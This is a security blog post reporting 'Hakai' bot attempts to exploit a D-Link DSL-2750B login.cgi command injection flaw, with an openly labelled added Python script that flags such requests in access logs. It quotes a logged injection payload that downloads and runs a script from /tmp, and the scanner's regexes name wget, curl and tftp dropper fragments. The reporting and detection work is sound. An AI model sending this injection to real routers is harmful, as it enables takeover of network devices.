Hakaied with love from Telecom Egypt

In the last two weeks I’ve seen a steady increase of bots trying to exploit a remote command execution flaw on D-Link routers. The majority of the attacks are originating from IP blocks belonging to Telecom Egypt Data.

The vulnerability, from what I understand, is an old bug affecting D-Link firmware versions from 1.01 up to 1.03. Recently though, the flaw has been gathering some traction after being weaponized through Metasploit.

Metasploit: D-Link DSL-2750B OS Command Injection.

From my experience, few companies will bother with patching network equipment, so this will be yet another gift that keeps on giving. For the record, the list of bots and payload servers added to this post were extracted from a recent access log for paranoidpenguin.net.

Request: - - [03/Aug/2018:13:24:56 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://;sh%20/tmp/hk%27$ HTTP/1.1" "Hakai/2.0"
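As an added example that is not part of the original post, the Python below shows how a defender can pull requests like the one above out of a web server access log: it URL-decodes the `cli` parameter of `/login.cgi` requests and flags shell separators, download-and-run fragments and the Hakai user agent. Only the "Hakai/2.0" line is taken from the post; the two benign lines and their 192.0.2.x addresses are constructed for the example, and the assumption that later bots keep the `Hakai/` user-agent prefix is just that.

```python
"""Flag D-Link DSL-2750B login.cgi command-injection attempts in access logs.

Added example, not code from the original post. Parses combined-format
access log lines, percent-decodes the `cli` parameter of /login.cgi
requests and reports shell metacharacters, dropper fragments and the
Hakai user agent. The 192.0.2.x lines in SAMPLE_LOG are constructed.
"""
import re
from urllib.parse import unquote, urlsplit

# Quoted fields ("request", "referer", "user-agent") and the bracketed timestamp.
QUOTED_FIELD = re.compile(r'"((?:[^"\\]|\\.)*)"')
TIMESTAMP = re.compile(r"\[([^\]]+)\]")

# Shell control characters that have no business inside a login parameter.
SHELL_META = re.compile(r"[;|`&\n]|\$\(")
# Stage-1 dropper fragments: fetch a script, then run it from /tmp.
DROPPER = re.compile(r"\b(wget|curl|tftp|ftpget)\b|\bsh\s+/tmp/|/tmp/\S+", re.I)
# User agent observed in the post; assumes later variants keep the prefix.
HAKAI_UA = re.compile(r"^Hakai/", re.I)

SAMPLE_LOG = [
    # Taken from the post (client IP redacted by the author).
    '- - [03/Aug/2018:13:24:56 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://;sh%20/tmp/hk%27$ HTTP/1.1" "Hakai/2.0"',
    # Constructed benign traffic (TEST-NET addresses).
    '192.0.2.10 - - [03/Aug/2018:13:30:00 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.11 - - [03/Aug/2018:13:31:07 +0200] "GET /login.cgi?cli=admin HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def parse_query(query: str) -> dict:
    """Split a raw query string on '&' only, then percent-decode key and value.

    urllib.parse.parse_qs is avoided on purpose: older Pythons also split
    on ';', which would hide the injected command separator.
    """
    params = {}
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def analyze_line(line: str) -> dict:
    """Return a verdict for one access-log line."""
    quoted = QUOTED_FIELD.findall(line)
    ts_match = TIMESTAMP.search(line)
    result = {
        "timestamp": ts_match.group(1) if ts_match else None,
        # The request is the first quoted field, the user agent the last one.
        "user_agent": quoted[-1] if len(quoted) >= 2 else None,
        "decoded_cli": None,
        "reasons": [],
        "suspicious": False,
    }
    if not quoted:
        return result  # no request field at all; nothing to decode
    request = quoted[0].split(" ")
    if len(request) != 3:
        return result  # malformed "METHOD target PROTO" field
    _method, target, _proto = request
    parts = urlsplit(target)
    params = parse_query(parts.query)

    if parts.path.endswith("/login.cgi") and "cli" in params:
        cli = params["cli"]
        result["decoded_cli"] = cli
        if SHELL_META.search(cli):
            result["reasons"].append("shell metacharacters in login.cgi cli parameter")
        if DROPPER.search(cli):
            result["reasons"].append("download-and-execute fragment in cli parameter")
    if result["user_agent"] and HAKAI_UA.match(result["user_agent"]):
        result["reasons"].append("Hakai user agent")
    result["suspicious"] = bool(result["reasons"])
    return result


def scan(lines) -> list:
    """Return the verdicts for every line that was flagged."""
    return [r for r in (analyze_line(l) for l in lines) if r["suspicious"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["timestamp"], hit["user_agent"], hit["reasons"])
        print("  decoded cli:", hit["decoded_cli"])
```

Run against a real log with `scan(open("access.log"))`; the decoded `cli` value is what you want to look at, since the percent-encoding in the raw line hides the `;` separators and the `sh /tmp/...` stage that make this an injection rather than a login attempt.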

Payload script:

Hakai payload

Payload servers:

Hakai (user agent): to destroy someone or something, according to Urban Dictionary.